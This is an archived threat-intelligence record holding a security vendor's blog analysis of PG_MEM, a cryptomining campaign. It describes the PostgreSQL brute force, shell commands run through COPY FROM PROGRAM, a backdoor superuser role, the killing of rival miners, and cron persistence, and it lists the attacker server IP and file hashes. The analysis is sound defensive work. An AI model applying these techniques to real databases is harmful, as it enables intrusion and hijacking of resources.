{ "id": "8fce27bd-be7c-4d6f-a38f-020efcf9c896", "created_at": "2026-04-06T00:13:36.691811Z", "updated_at": "2026-04-10T03:34:59.833154Z", "deleted_at": null, "sha1_hash": "b9920be1ae93cbe482c9fafc95c96479f3881f05", "title": "PG_MEM: A Malware Hidden in the Postgres Processes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4940331, "plain_text": "PG_MEM: A Malware Hidden in the Postgres Processes\r\nBy Assaf Morag\r\nPublished: 2024-08-19 · Archived: 2026-04-05 14:46:33 UTC\r\nAqua Nautilus researchers have uncovered PG_MEM, a new PostgreSQL malware, that brute forces its way into\r\nPostgreSQL databases, delivers payloads to hide its operations, and mines cryptocurrency. In this blog, we explain\r\nthis attack, the techniques used by the threat actor, and how to detect and protect your environments.\r\nAbout Postgres\r\nPostgreSQL, commonly known as Postgres, is a powerful, open source relational database management system\r\n(RDBMS) known for its robustness and flexibility. Brute force attacks on Postgres involve repeatedly attempting\r\nto guess the database credentials until access is gained, exploiting weak passwords. Once accessed, attackers can\r\nleverage the COPY … FROM PROGRAM SQL command to execute arbitrary shell commands on the host,\r\nallowing them to perform malicious activities such as data theft or deploying malware.\r\nAttack flow\r\nWe observed a successful brute force attack on a PostgreSQL database, which led to the exploitation of a feature\r\nthat allows command execution. Next, the threat actor created a superuser role in the database and dropped two\r\nfiles to disk. These files are used to eliminate competition, evade detection, gain persistence, and ultimately\r\ndeploy cryptocurrency miners. While this is the main impact, at this point the attacker can also run commands,\r\nview data, and control the server.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 1 of 14\n\nFigure 1: Attack flow of PG_MEM\r\nBrute Force Attack\r\nThe first stage is a simple brute force attack. We observe several login attempts to the PostgreSQL database being\r\nrefused until the brute force attack successfully guesses the honeypot’s username and password (which were\r\nintentionally set to be easy to guess).\r\nFigure 2: Screenshot from Wireshark, illustrating failed brute force attempt against Postgres\r\nGaining Persistence\r\nAfter the threat actor successfully guess the user and password, the attack sequence commenced. The following\r\nset of SQL commands, were executed:\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 2 of 14\n\nFigure 3: The threat actor’s command to create a new superuser (backdoor)\r\nFirst, the threat actor creates a new user role with login capability and high privileges. Next, the threat actor\r\ninteracts with the current user who initially enabled access to the system. The SELECT CURRENT_USER\r\ncommand retrieves the name of the current database user in the session. The following command prints the names\r\nof the users and indicates if they have superuser privileges. Then, the current user postgres is stripped of superuser\r\nprivileges. This restricts the privileges of other threat actors who might still gain access to the system via the weak\r\npassword.\r\nInitial System Discovery\r\nThe threat actor is gathering information about the system.\r\nFigure 4: Compilation of commands aimed to discover the system\r\nThe first command displays the path to the pg_hba.conf file, which is the configuration file for client\r\nauthentication. The second command retrieves the version of the PostgreSQL server. Next, the threat actor creates\r\na temporary table to store temporary data and files before they are saved to disk or memory. The threat actor uses\r\nthe PROGRAM feature, which enables shell commands on the host. The threat actor runs uname and whoami and\r\nstores the data in the temporary table. Each time, the temp table is deleted with the TRUNCATE command, which\r\nis a faster and more efficient deletion action in PostgreSQL.\r\nPayload Delivery\r\nIn total, there are two files downloaded from the threat actor’s remote server. In Figure 5 below, you can observe\r\nthe first block of commands aimed at delivering the first payload.\r\nIn general, the threat actor uses a temporary table to store various code and data. Before and after each command,\r\nthe threat actor uses TRUNCATE to clear the temporary table (pg_temp.log_tmp) and then uses COPY … FROM\r\nPROGRAM to execute various shell commands, capturing their output into the table.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 3 of 14\n\nFigure 5: Delivery of PG_Core malware\r\nThe threat actor is using the following command to open a TCP connection to the IP address 128.199.77.96 on\r\nport 3232 and get dqQkiJwLFH. It is then stored as the file pg_core.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 4 of 14\n\nFigure 6: Downloading of PG_Core from the threat actor’s server\r\nNext using chmod the pg_core file is modified to be an executed and the MD5 is calculated. The pg_core file is\r\nlater executed with a specific argument. This string is encoded with base64 and after decoded, you can see a\r\ncrypto mining related message, where h probably stands for hash and p stands for assigned worker.\r\nFigure 7: Execution command to PG_Core, decoded from base64\r\nThe executable data is also stored in the temporary table and then saved on the path /var/lib/postgresql/data/log-tmp.\r\nThe code is also designed to retrieve the process ID of the current PostgreSQL backend process. This can be\r\nuseful for debugging or monitoring purposes.\r\nIn addition, all cron jobs for the current user are removed and various processes are being killed such as\r\nkdevtmpfsi, pg_mem, kinsing, postgres-kernel, and others.\r\nThe threat actor is stopping historic attacks of himself and others, this shows that he has some intel on\r\ncompetitors.\r\nFigure 8: The command given to kill competing malware\r\nLastly, the threat actor deletes files such as the binary pg_core and logs of the malware such as ps_stat_good to\r\nevade defenses (such as volume-based scanners).\r\nThe threat actor also deploys a second payload, named pg_mem, this is a dropper which contains xmr\r\ncryptominer, and is responsible to optimize crypto mining operation. Below you can see operations via Postgres,\r\nwhich are very similar to the delivery of the first payload.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 5 of 14\n\nFigure 9: Compilation of commands to deliver PG_mem\r\nAs can be seen, the threat actor opens a TCP connection to the IP address `128.199.77.96` on port `3232` and get\r\nKfLhjeXuQc. It is then stored as the file pg_mem.\r\nAfter the ELF file pg_mem is executed, it stores a third ELF binary named memory. This file is an XMRIG\r\ncryptominer, which is used to mine cryptocurrency.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 6 of 14\n\nFigure 10: The configuration of the XMRIG\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 7 of 14\n\nFigure 11: Mining Cryptocurrency data\r\nAs can be seen in Figure 12 below, the cryptominer memory is executed with the argument deleted and in\r\naddition, the threat actor is creating a cron job with the execution of pg_mem and it inserts an empty value into the\r\npg_hba  configuration file.\r\nFigure 12: A cron job aimed to create persistence on the Postgres server\r\nThere are 3 files dropped to disk on the following path /var/lib/postgresql/data/:\r\nmemory (MD5: 3f3eae22dd67e741e87a18a2383900a5) detected in VT as a cryptominer.\r\npg_core (MD5: aacf2146cac9946592f069ef6d94635b) with various detections, such as Potentially\r\nunwanted, cryptominer, trojan, etc.\r\npg_mem (MD5: f705c3bc4e98585357c03feac623356c) with various detections, such as Potentially\r\nunwanted, cryptominer, trojan, etc.\r\nAll 3 ELF binaries are packed, stripped and the strings were encrypted.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 8 of 14\n\nExposed Postgres Servers in the Wild\r\nShodan, the search engine for Internet-connected devices, was utilized to identify exposed PostgreSQL databases.\r\nBy querying Shodan for publicly accessible Postgres instances, we uncovered more than 800,000 internet\r\nconnected databases. This highlights the critical need for securing database servers against brute force attacks and\r\npotential exploitation.\r\nFigure 13: The results in Sodan of searching for internet facing Postgres servers\r\nMapping the Campaign to the MITRE ATT\u0026CK Framework\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 9 of 14\n\nOur investigation showed that the attackers have been using some common techniques throughout the campaign.\r\nHere we map each component of the attack to the corresponding techniques of the MITRE ATT\u0026CK framework:\r\nThe described attack involves several stages, each utilizing different techniques and sub-techniques according to\r\nthe MITRE ATT\u0026CK framework. Here is a breakdown of the relevant techniques and sub-techniques:\r\nInitial Access\r\nT1190 – Exploit Public-Facing Application: The attacker exploits a vulnerability in the Postgres database\r\nto gain initial access.\r\nExecution\r\nT1059.004 – Command and Scripting Interpreter: Unix Shell: The attacker executes SQL commands that\r\nleverage the PROGRAM feature to run shell commands on the host system.\r\nPersistence\r\nT1136.001 – Create Account: Local Account: The attacker creates a new user role with login capabilities\r\nand high privileges.\r\nT1098 – Account Manipulation: The attacker manipulates user roles and privileges, stripping superuser\r\nprivileges from the existing postgres user to maintain access and control.\r\nT1053.003 – Scheduled Task/Job: Cron: Removing all cron jobs to prevent interference from legitimate\r\nscheduled tasks, and adding a cron job to run pg_mem.\r\nPrivilege Escalation\r\nT1068 – Exploitation for Privilege Escalation: The attacker escalates privileges by exploiting the ability to\r\nexecute commands as a superuser.\r\nDefense Evasion\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 10 of 14\n\nT1070.004 – Indicator Removal on Host: File Deletion: The attacker deletes files and logs related to their\r\nmalware to evade detection.\r\nT1036.004 – Masquerading: Masquerade Task or Service: The attacker modifies the pg_core file to be\r\nexecutable and disguises it as a legitimate file.\r\nCredentials Access\r\nT1110.002 – Brute Force: Password Guessing: The attacker uses brute force to guess the user and password\r\nof the Postgres database.\r\nDiscovery\r\nT1082 – System Information Discovery: The attacker gathers system information using commands like\r\nuname and whoami.\r\nT1057 – Process Discovery: The attacker retrieves the process ID of the PostgreSQL backend process for\r\nfurther analysis or manipulation.\r\nCollection\r\nT1005 – Data from Local System: The attacker collects data by viewing and extracting information from\r\nthe database and the host system.\r\nCommand and Control\r\nT1105 – Ingress Tool Transfer: The attacker downloads files from a remote server to the compromised\r\nsystem.\r\nT1071.001 – Application Layer Protocol: Web Protocols: The attacker uses web protocols to communicate\r\nwith the remote server for command and control.\r\nImpact\r\nT1496 – Resource Hijacking: The primary impact is the deployment of cryptominers, leveraging the\r\nsystem’s resources to mine cryptocurrency.\r\nDetection and remediation with Aqua’s CNAPP\r\nThis campaign is exploiting internet facing Postgres databases with weak password. Many organizations connect\r\ntheir databases to the internet, weak password is a result of a misconfiguration, and lack of proper identity\r\ncontrols. This is not a rare issue and many large organizations suffer from these problems. Aqua Security can\r\nprovide invaluable information concerning vulnerabilities and misconfigurations, but sometimes employees\r\nchoose weak passwords or a zero-day vulnerability emerges.\r\nFor this reason you should adopt defense in depth approach which aims to deploy detection and protection\r\nmechanisms in various junctions of your software development life cycle in the cloud. Runtime detection and\r\nresponse tools such as Aqua’s Runtime Protection are built to detect malicious or suspicious behavior in runtime.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 11 of 14\n\nIf one of your running workloads is vulnerable to the Confluence vulnerability, Aqua’s Runtime Protection will let\r\nyou see all the relevant detection. For instance, we highlighted two detections below:\r\nFigure 14: Aqua’s Runtime Protection screenshot illustrating a detection of malicious shell command originating\r\nfrom a database\r\nIn Figure 14 above, you can see a detection of database program spawned a shell, indicating a suspicious behavior\r\nof databases running shell commands. The execution of the shell is also marked as malicious. You can see that it\r\nillustrates TCP connection and fetching the main payload.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 12 of 14\n\nFigure 15: Aqua’s Runtime Protection screenshot illustrating crypto mining process\r\nSimilarly in Figure 15 above, you can see a DNS resolve request for a crypto pool and a communication to the\r\ncryptomining pool.\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 13 of 14\n\nAssaf is the Director of Threat Intelligence at Aqua Nautilus. He is responsible of acquiring threat intelligence\r\nrelated to software development life cycle in cloud native environments, supports the team's data needs, and helps\r\nAqua and the ecosystem remain at the forefront of emerging threats and protective methodologies. His research\r\nhas been featured in leading information security publications and journals worldwide, and he has presented at\r\nleading cybersecurity conferences. Notably, Assaf has also contributed to the development of the new MITRE\r\nATT\u0026CK Container Framework.\r\nAssaf is leading an O’Reilly course, focusing on cyber threat intelligence in cloud-native environments. The\r\ncourse covers both theoretical concepts and practical applications, providing valuable insights into the unique\r\nchallenges and strategies associated with securing cloud-native infrastructures.\r\nSource: https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nhttps://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/" ], "report_names": [ "pg_mem-a-malware-hidden-in-the-postgres-processes" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-10T02:00:03.311299Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434416, "ts_updated_at": 1775792099, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b9920be1ae93cbe482c9fafc95c96479f3881f05.pdf", "text": "https://archive.orkl.eu/b9920be1ae93cbe482c9fafc95c96479f3881f05.txt", "img": "https://archive.orkl.eu/b9920be1ae93cbe482c9fafc95c96479f3881f05.jpg" } }